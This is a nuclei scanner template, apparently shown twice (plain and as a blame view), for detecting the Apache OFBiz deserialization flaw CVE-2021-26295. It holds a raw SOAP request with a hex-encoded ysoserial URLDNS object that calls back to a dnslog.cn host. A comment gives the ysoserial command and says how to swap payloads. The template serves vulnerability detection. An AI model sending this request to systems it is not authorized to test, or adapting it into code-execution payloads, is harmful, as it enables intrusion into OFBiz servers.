nuclei-templates/cves/2021/CVE-2021-26295.yaml

id: CVE-2021-26295
info:
  name: Apache OFBiz RMI deserializes Arbitrary Code Execution
  author: madrobot
  severity: critical
  tags: apache,cve,cve2021,rce
  description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295

  # Note:- This is detection template To perform deserializes
  # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
  # hex mad.ot and replace in <cus-obj> along with the user in  std-String value
requests:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
        Connection: close
        Content-Type: application/xml
        Content-Length: 910

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header/>
        <soapenv:Body>
        <ser>
        <map-HashMap>
        <map-Entry>
        <map-Key>
        <cus-obj>
        bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a</cus-obj>
        </map-Key>
        <map-Value>
        <std-String value="http://t53lq9.dnslog.cn/"></std-String>
        </map-Value>
        </map-Entry>
        </map-HashMap>
        </ser>
        </soapenv:Body>
        </soapenv:Envelope>


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "OFBiz.Visitor="
        part: header
      - type: word
        words:
          - "null (Illegal hexadecimal character &#xa; at index 0)"
          - "errorMessage"
        part: body
Create CVE-2021-26295.yaml 2021-03-23 16:00:15 +00:00			`id: CVE-2021-26295`
			`info:`
Update CVE-2021-26295.yaml 2021-03-23 16:02:09 +00:00			`name: Apache OFBiz RMI deserializes Arbitrary Code Execution`
Create CVE-2021-26295.yaml 2021-03-23 16:00:15 +00:00			`author: madrobot`
			`severity: critical`
			`tags: apache,cve,cve2021,rce`
			`description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.`
			`reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295`

			`# Note:- This is detection template To perform deserializes`
			`# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot`
			`# hex mad.ot and replace in <cus-obj> along with the user in std-String value`
			`requests:`
			`- raw:`
			`- \|`
			`POST /webtools/control/SOAPService HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept-Encoding: gzip, deflate`
			`Accept: /`
			`Accept-Language: en`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36`
			`Connection: close`
			`Content-Type: application/xml`
			`Content-Length: 910`

			`<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">`
			`<soapenv:Header/>`
			`<soapenv:Body>`
			`<ser>`
			`<map-HashMap>`
			`<map-Entry>`
			`<map-Key>`
			`<cus-obj>`
			bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a</cus-obj>
			`</map-Key>`
			`<map-Value>`
			`<std-String value="http://t53lq9.dnslog.cn/"></std-String>`
			`</map-Value>`
			`</map-Entry>`
			`</map-HashMap>`
			`</ser>`
			`</soapenv:Body>`
			`</soapenv:Envelope>`


			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- "OFBiz.Visitor="`
			`part: header`
			`- type: word`
			`words:`
			`- "null (Illegal hexadecimal character at index 0)"`
			`- "errorMessage"`
			`part: body`